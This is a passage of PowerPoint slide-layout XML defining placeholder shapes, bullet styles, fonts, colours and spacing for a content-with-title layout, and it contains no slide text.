            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6193369" y="2174875"/>
            <a:ext cx="5389032" cy="3951287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-190490" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-171431" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-126971" lvl="2" marL="1142971" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-139659" lvl="3" marL="1600160" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="–"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-139649" lvl="4" marL="2057349" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-139637" lvl="5" marL="2514537" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-139625" lvl="6" marL="2971726" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-139613" lvl="7" marL="3428914" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-139603" lvl="8" marL="3886103" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>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Tx">
  <p:cSld name="含標題的內容">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="47" name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609602" y="273048"/>
            <a:ext cx="4011084" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766732" y="273053"/>
            <a:ext cx="6815666" cy="5853112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-139690" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-120631" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-88871" lvl="2" marL="1142971" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609602" y="1435101"/>
            <a:ext cx="4011084" cy="4691063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
